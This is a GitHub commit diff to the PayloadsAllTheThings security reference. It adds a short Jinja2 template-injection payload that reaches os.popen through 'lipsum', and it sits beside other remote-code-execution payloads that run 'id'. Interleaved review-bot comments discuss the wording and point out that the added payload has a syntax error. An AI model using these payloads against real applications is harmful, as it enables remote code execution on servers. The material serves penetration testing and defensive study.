mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 17:28:49 +00:00
Merge pull request #642 from p0dalirius/patch-1
Adding Jinja2 RCE through lipsum in Templates
This commit is contained in:
commit
8d2c30e969
@ -563,7 +563,7 @@ But when `__builtins__` is filtered, the following payloads are context-free, an
|
|||||||
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
|
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
|
||||||
```
|
```
|
||||||
|
|
||||||
We can use these shorter payloads (this is the shorter payloads known yet):
|
We can use these shorter payloads:
|
||||||
|
|
||||||
```python
|
```python
|
||||||
{{ cycler.__init__.__globals__.os.popen('id').read() }}
|
{{ cycler.__init__.__globals__.os.popen('id').read() }}
|
||||||
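Review bot: Dropping the parenthetical "(this is the shorter payloads known yet)" from the lead-in line is the right call here, since the text added further down in this same commit describes the `lipsum` payload as the shortest known; keeping both sentences would have left the section contradicting itself. The remaining sentence "We can use these shorter payloads:" still reads correctly against the context-free `self._TemplateReference__context` payload above it.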
@ -573,6 +573,14 @@ We can use these shorter payloads (this is the shorter payloads known yet):
|
|||||||
|
|
||||||
Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/
|
Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/
|
||||||
|
|
||||||
|
With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template:
|
||||||
|
|
||||||
|
```python
|
||||||
|
{{ lipsum.__globals__.["os"].popen('id').read() }}
|
||||||
|
```
|
||||||
|
|
||||||
|
Source: https://twitter.com/podalirius_/status/1655970628648697860
|
||||||
|
|
||||||
#### Exploit the SSTI by calling subprocess.Popen
|
#### Exploit the SSTI by calling subprocess.Popen
|
||||||
|
|
||||||
:warning: the number 396 will vary depending of the application.
|
:warning: the number 396 will vary depending of the application.
|
||||||
|
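Review bot: The added payload line `{{ lipsum.__globals__.["os"].popen('id').read() }}` has a syntax error: a `.` immediately followed by `[` is not valid Jinja2 expression syntax, so this template would fail to render rather than demonstrate anything. The surrounding payloads in this section consistently use the attribute form (`cycler.__init__.__globals__.os.popen(...)`), so the stray dot should be removed for consistency with them. Minor style point: the new fenced block is tagged `python` although it contains Jinja2 template syntax; that matches the existing blocks in this file, so it is acceptable, but the source line ("Source: https://twitter.com/...") would read more consistently with the earlier citation in the same section if it also named the author as `[@podalirius_](https://twitter.com/podalirius_)`.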